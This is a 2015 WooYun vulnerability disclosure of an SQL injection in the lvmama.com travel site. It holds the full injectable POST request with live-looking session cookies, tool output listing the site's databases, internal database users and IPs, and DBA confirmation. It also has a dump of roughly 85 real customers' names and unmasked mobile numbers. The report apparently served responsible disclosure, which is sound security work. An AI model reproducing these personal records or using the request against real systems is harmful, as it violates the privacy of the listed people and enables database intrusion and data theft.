当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149508

漏洞标题:驴妈妈旅游网SQL注入漏洞(涉及40W用户信息/邮箱/手机号码)

相关厂商:驴妈妈旅游网

漏洞作者: Xmyth_Xi2oMin9

提交时间:2015-10-26 11:47

修复时间:2015-12-10 14:58

公开时间:2015-12-10 14:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-26: 细节已通知厂商并且等待厂商处理中
2015-10-26: 厂商已经确认,细节仅向厂商公开
2015-11-05: 细节向核心白帽子及相关领域专家公开
2015-11-15: 细节向普通白帽子公开
2015-11-25: 细节向实习白帽子公开
2015-12-10: 细节向公众公开

简要描述:

驴妈妈旅游网创立于2008年,是中国的新型B2C旅游电子商务网站,中国的自助游产品预订及资讯服务平台。成立之初,驴妈妈就以自助游服务商定位市场,经过数年发展,形成了以,同时兼顾跟团游的巴士自由行、长线游、出境游等网络旅游业务,为游客出行提供一站式服务便利。

详细说明:

POST /zt/promo/jingpai/ HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: http://www.lvmama.com/zt/promo/jingpai/?losc=018454
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: www.lvmama.com
Content-Length: 22
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: uid=wKgKcFYog5wUhDoMAwSLAg==; lvsessionid=6bae512d-cab8-44b0-8484-dbf3dc91a2f7_19599120; PHPSESSID=8jeoh55slod7o2kdjqapfg3ke7; cmTPSet=Y;
CoreID6=80631807383514455029084&ci=90409730; JSESSIONID=D5BFF75625F84EBBE7EBC2BFDA40E347; ip_from_place_id=1; ip_from_place_name=""; ip_area_location=BJ;
ip_location=114.252.84.34; ip_province_place_id=110000; ip_city_place_id=110000; ip_city_name=%E5%8C%97%E4%BA%AC; bdshare_firstime=1445503292281;
Rvyz72RO3yiChuCn=Nd7JknIMvMbwmiaxz91Y1fgy%2BofrdUg5iPag4kOzZdjK64Ach%2FkRy8ak7RlN7fbxI9hNU5V%2Bpo25jKklYvylU9ctWR%2F2gu0Szk6XN2ibMagh9k1kWIp28sgmU6mHWraMxXqg%2FGgUW17nleI1cK9I
%2Foeo0hG3UbsB4IcQZ%2BgZVrCP1DksKEqcVdc1Zg0IKCypFEvlHUhVvQKBRY3XVkFIiotfIFb%2FyxkR1RiuImfCtOuEm%2Bco1NUKix2pJ4J45kk7wt5aGVy2dGoAzR
%2F0VapeEsWFSqIHK4JxrvcIw9jKzIM28E57GpoVKovg0WY1pgPs2bsIVPmlw9P%2FZniVorYY%2BaGeW3BmiWnOOnooCM6W4VsmxUHOt4YQ7HDotUE9kIdyq%2FiAUCniceuIcDb0s%2F1MHjIElt7%2FPJjGYxDn6H4ZuRsd
%2B0%2FCZ4%2FwVq5LhubjFQxuNs%2FAudtMhIm0t5%2FCMx6C0g%3D%3D147184d890600e57142c00419dd6d3b8fb734b5c;
Hm_lvt_006c64491cb8acf2092ce0e0341797fe=1445503759,1445503760,1445503762,1445503780; Hm_lpvt_006c64491cb8acf2092ce0e0341797fe=1445503780; _gscu_1059159971=45503269im498j16;
_gscs_1059159971=455032692ykal116|pv:14; _gscbrs_1059159971=1; CNZZDATA5199293=cnzz_eid%3D146445622-1445503813-%26ntime%3D1445503813; __utmt=1; _lvTrack_UUID=0BBAB92F-E147-
4DFA-995F-4A47F94DA774; _lvTrack_sessionID=DFB3BACB-A4A2-4325-BD2A-E2E9F8ED65C7; 90409730_clogin=v=1&l=1445502908&e=1445506446307; bfd_s=30114658.29133386.1445502959660;
tmc=19.30114658.23722909.1445502959661.1445504673964.1445504675949; tma=30114658.77050305.1445495717462.1445495717462.1445495717462.1; tmd=21.30114658.77050305.1445495717462.;
Hm_lvt_cb09ebb4692b521604e77f4bf0a61013=1445495717; Hm_lpvt_cb09ebb4692b521604e77f4bf0a61013=1445504680; bfd_g=a7fcd4ae5266aa7700004f9a00003c4b562883a2;
__xsptplus443=443.2.1445502958.1445504695.9%233%7C%20http%3A%2F%2Fworldcup.lvmama.com%2F%7C%7C%7C%7C%23%23RSaZsYr184i7YqTumvZYCkmKHh5evnOM%23;
__utma=30114658.629155318.1445503956.1445503956.1445503956.1; __utmb=30114658.27.10.1445503956; __utmc=30114658; __utmz=30114658.1445503956.1.1.utmcsr=(direct)|utmccn=
(direct)|utmcmd=(none); CASTGC=TGC-4894-9cPH1OpoQvrcbEXxkS8XlUUpRwPbuhFFichqGwy2Oqbewl5CeM; UN=mtestqingyouawlk%5E%21%5E4028b25b5024472e01502b7213020a7b;
unUserName=mtestqingyouawlk; LSTA=792dda8547d49ad39f58801a348ac4a5; ticket=ST-6718-yWol7IXNAaaSHPbWfnNL; bqeRoYZ7gjxuUl7T=hc9vwzkfrdgsYDymMaiPiQctebJZNegXeCFaJD
%2FVQvZtsP6M5N2Iqs2S9Treo7wvs8EHIjqpMydw1lAw9JSsfuPguLC0Qxp285oJFGb7WZsCh3YoBFnI8YwRP%2FdpJTAOBo2lQBV3fAbJ6ayATnWl1s5wplyPxRJJQ1fn0RbgFn8x0iI5kx3KP5XqaiXU%2BmYLDs
%2BdZWJNNQfn1RJK022w13Jit8oTdYNJpkX8uhRZ
%2Bs2tKdLd1tSamC3AYVrozJlzYy35arQryczKP9xZUwckwXIIRcK9QXJst50CFKr7n4Vk6LjPyX5qSwbzNJoPv3UGBq5OgxC7OfCC4tP55JkvUvi5%2FVWQs2bs6rbUFVuKaOWqtAsx
%2B2cVDab6voEkET4Bf4kEOEqIHCWGQy2YH0dNg3ISjl%2BD20F9XjhEDrozWM4v2PBeGxkS7P4cqYfWLjyUQLNOP4JxUEXaydcct9ixsQ%3D%3D9b93b499da7723026d731c4e157b02851f6358dd
action=ajaxRecord&pid=1

1.png

漏洞证明:

available databases [18]:
[*] info
[*] infonews
[*] information_schema
[*] lmm_core
[*] lmm_customization
[*] lmm_guide
[*] lmm_logs
[*] lmm_lvyou
[*] lmm_message
[*] lmm_module
[*] lmm_subject
[*] lmm_subjects2
[*] lmm_weather
[*] lvmamabus
[*] minisite
[*] mysql
[*] others
[*] post_robot


用户:

database management system users [51]:
[*] 'activity'@'192.168.10.%'
[*] 'bi'@'192.168.10.77'
[*] 'bi_guide'@'192.168.10.%'
[*] 'bi_lvyou'@'192.168.10.%'
[*] 'bi_trip'@'192.168.10.%'
[*] 'customization'@'192.168.10.%'
[*] 'customization'@'192.168.30.%'
[*] 'gonglue'@'192.168.10.%'
[*] 'guide2'@'192.168.10.%'
[*] 'info'@'192.168.10.%'
[*] 'infonews'@'192.168.10.%'
[*] 'intelligence'@'%'
[*] 'lmm_core'@'192.168.10.%'
[*] 'lmm_core'@'192.168.30.%'
[*] 'lmm_core'@'192.168.30.0\\/24'
[*] 'lmm_guide'@'192.168.10.%'
[*] 'lmm_logs'@'192.168.10.%'
[*] 'lmm_logs'@'192.168.30.%'
[*] 'lmm_message'@'192.168.10.%'
[*] 'lmm_message'@'192.168.30.%'
[*] 'lmm_module'@'192.168.10.%'
[*] 'lmm_module'@'192.168.30.%'
[*] 'lmm_subject'@'192.168.10.%'
[*] 'lmm_subject'@'192.168.30.%'
[*] 'lmm_subjects'@'192.168.10.%'
[*] 'lmm_trip'@'192.168.10.55'
[*] 'lmm_trip'@'192.168.30.%'
[*] 'lmm_weather'@'192.168.10.%'
[*] 'lmm_weather'@'192.168.30.%'
[*] 'lv_bbs_x2'@'192.168.10.%'
[*] 'lv_bbs_x2'@'192.168.10.16'
[*] 'lv_ospeed_admin'@'192.168.10.%'
[*] 'lv_oth1058_admin'@'192.168.10.58'
[*] 'lv_others_admin'@'192.168.10.%'
[*] 'lv_others_admin'@'192.168.10.16'
[*] 'lv_spdbank_admin'@'192.168.10.%'
[*] 'lvmama_lvyou'@'192.168.10.%'
[*] 'lvmama_lvyou'@'192.168.30.%'
[*] 'lvmama_lvyou'@'192.168.50.%'
[*] 'lvmamabus'@'192.168.10.%'
[*] 'lvmamaGUIDE22012'@'192.168.10.%'
[*] 'lvmamaGUIDE22012'@'192.168.30.%'
[*] 'lvmamainfo'@'192.168.10.%'
[*] 'minisite'@'192.168.10.%'
[*] 'ndouser'@'192.168.10.%'
[*] 'repl'@'%'
[*] 'root'@'%'
[*] 'root'@'192.168.10.%'
[*] 'root'@'192.168.20.%'
[*] 'root'@'localhost'
[*] 'suipian'@'192.168.10.%'


current user is DBA:    True


1.png


列出一部分 还有很多

| \\u6797\\u71d5\\u73b2                      | [email protected]              | 18824876464 |
| \\u6c64\\u745e\\u519b | [email protected] | 18685034481 |
| \\u8881\\u840c\\u840c | [email protected] | 18773158473 |
| \\u8d21\\u5a77\\u5a77 | [email protected] | 13357399729 |
| \\u9a6c\\u6625\\u4e3d | [email protected] | 15166998827 |
| \\u949f\\u6d2a\\u4e91 | [email protected] | 18850251809 |
| \\u7f57\\u7476 | [email protected] | 13590985099 |
| \\u738b\\u6587\\u5f81 | [email protected] | 15083218171 |
| \\u5468\\u8587 | [email protected] | 13775136536 |
| \\u5f90\\u82b3 | [email protected] | 13677012150 |
| \\u51cc\\u7f8e\\u5a1c | [email protected] | 13562917517 |
| \\u4e8e\\u4e3d\\u5a1f | [email protected] | 13764940215 |
| \\u738b\\u4f73\\u96ef | [email protected] | 13918907903 |
| \\u5e2d\\u5a77 | [email protected] | 18679400560 |
| \\u6c5f\\u529b | [email protected] | 13879826561 |
| \\u6731\\u4e9a\\u5a1f | [email protected] | 15515195572 |
| \\u9648\\u5c11\\u6e05 | [email protected] | 13590658929 |
| \\u8f9c\\u8bd7\\u60c5 | [email protected] | 18673637725 |
| \\u8463\\u4e39 | [email protected] | 13951672988 |
| \\u6881\\u82b8 | [email protected] | 15050523259 |
| \\u5f20\\u536b\\u82ac | [email protected] | 13588336030 |
| \\u5434\\u654f\\u541b | [email protected] | 13917539124 |
| \\u9648\\u71d5\\u59ae | [email protected] | 13534335511 |
| \\u590f\\u76fc\\u76fc | [email protected] | 18768145389 |
| \\u6797\\u59d7\\u59d7 | [email protected] | 13542586180 |
| \\u5434\\u5b59\\u4e50 | [email protected]qq.com | 18249941158 |
| \\u989c\\u52e4\\u5029 | [email protected] | 13566688226 |
| \\u6768\\u7a57\\u5a77 | [email protected] | 13824765996 |
| \\u5411\\u96ef\\u96ef | [email protected] | 13628205955 |
| \\u9648\\u8679 | [email protected] | 18645559168 |
| \\u9648\\u5ada\\u59ae | [email protected] | 13708738667 |
| \\u9ec4\\u8273 | [email protected] | 13638567969 |
| \\u5434\\u96ea | [email protected] | 13858960416 |
| \\u5468\\u73fa | [email protected] | 13636564969 |
| \\u90d1\\u96ea | [email protected] | 15983790901 |
| \\u4e01\\u679c | [email protected] | 15575300887 |
| \\u90d1\\u656c | [email protected] | 18681680885 |
| \\u9648\\u96ea\\u4e39 | [email protected] | 13631033410 |
| \\u59dc\\u5b81 | [email protected] | 13577002456 |
| \\u738b\\u6653\\u71d5 | [email protected] | 15080011292 |
| \\u4e8e\\u6db5 | [email protected] | 18353123458 |
| \\u674e\\u5a1c | [email protected] | 13077387452 |
| \\u738b\\u7f8e\\u840d | [email protected] | 13656562643 |
| \\u51af\\u96e8\\u66e6 | [email protected] | 15106823857 |
| \\u9b4f\\u79cb\\u51e4 | [email protected] | 18354230627 |
| \\u5362\\u71d5\\u73b2 | [email protected] | 13580923988 |
| \\u8463\\u7131 | [email protected] | 13913184385 |
| \\u77f3\\u521a | [email protected] | 13973684362 |
| \\u738b\\u680c\\u7fca | [email protected] | 15858156533 |
| \\u8bb8\\u8d1e\\u59ae | [email protected] | 13652323463 |
| \\u848b\\u6167\\u654f | [email protected] | 18662065004 |
| \\u6c64\\u4e00\\u654f | [email protected] | 18858132501 |
| \\u5415\\u6653\\u590f | [email protected] | 15807711853 |
| \\u738b\\u83b9 | [email protected] | 13858865688 |
| \\u502a\\u660e | [email protected] | 13951235229 |
| \\u8521\\u67f3\\u5a77 | [email protected] | 13580359390 |
| \\u5f90\\u8d85 | [email protected] | 13482429267 |
| \\u53f6\\u5029 | [email protected] | 13773042868 |
| \\u676d\\u5251\\u9f99 | [email protected] | 15895553057 |
| \\u5de8\\u664b\\u71d5 | [email protected] | 13818121277 |
| \\u738b\\u971e | [email protected] | 13627655306 |
| \\u8c22\\u4e5d\\u6885 | [email protected] | 15062777505 |
| \\u5b81\\u6b23 | [email protected] | 15275599575 |
| \\u674e\\u8389\\u4e39 | [email protected] | 13838292533 |
| \\u5b81\\u6b23\\u60a6 | [email protected] | 18716339043 |
| \\u4e54\\u78ca | [email protected] | 13292055522 |
| \\u4e50\\u5a9b | [email protected] | 13811271619 |
| \\u7f57\\u6728\\u6f7a | [email protected] | 18998500129 |
| \\u5434\\u660e\\u73e0 | [email protected] | 15160050876 |
| \\u674e\\u96ea | [email protected] | 18282050280 |
| \\u51b7\\u5b9c\\u6625 | [email protected] | 13917662850 |
| \\u8096\\u4e39 | [email protected] | 18744523981 |
| \\u738b\\u7490 | [email protected] | 13750830150 |
| \\u6c5f\\u4e9a\\u9a8f | [email protected] | 18673446284 |
| \\u5468\\u826f\\u666f | [email protected] | 15980384361 |
| \\u675c\\u6d0b | [email protected] | 18744006450 |
| \\u5f90\\u8000 | [email protected] | 13764463540 |
| \\u8521\\u8212\\u73b2 | [email protected] | 15059597008 |
| \\u90d1\\u91cd | [email protected] | 18675747775 |
| \\u6768\\u4e1d\\u96c1 | [email protected] | 18929088605 |
| \\u90b5\\u6960 | [email protected] | 18254591870 |
| \\u9648\\u6dd1\\u745c | [email protected] | 13450642111 |
| \\u9ec4\\u7af9 | [email protected] | 18978639325 |
| \\u656c\\u5c0f\\u6885 | [email protected] | 15216658470 |
| \\u5f20\\u6db5\\u5a67 | [email protected] | 13568357591 |


Database: others
Table: yx_users
[7 columns]
+-------------+------------------+
| Column | Type |
+-------------+------------------+
| create_time | int(11) |
| email | varchar(128) |
| id | int(10) unsigned |
| lvmama_code | varchar(16) |
| mobile | varchar(16) |
| yx_code | varchar(16) |
| yx_key | varchar(8) |
+-------------+------------------+


1.png

修复方案:

希望审核在厂商确认后 对一些信息适当的打码 辛苦了

版权声明:转载请注明来源 Xmyth_Xi2oMin9@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-10-26 14:57

厂商回复:

thx

最新状态:

暂无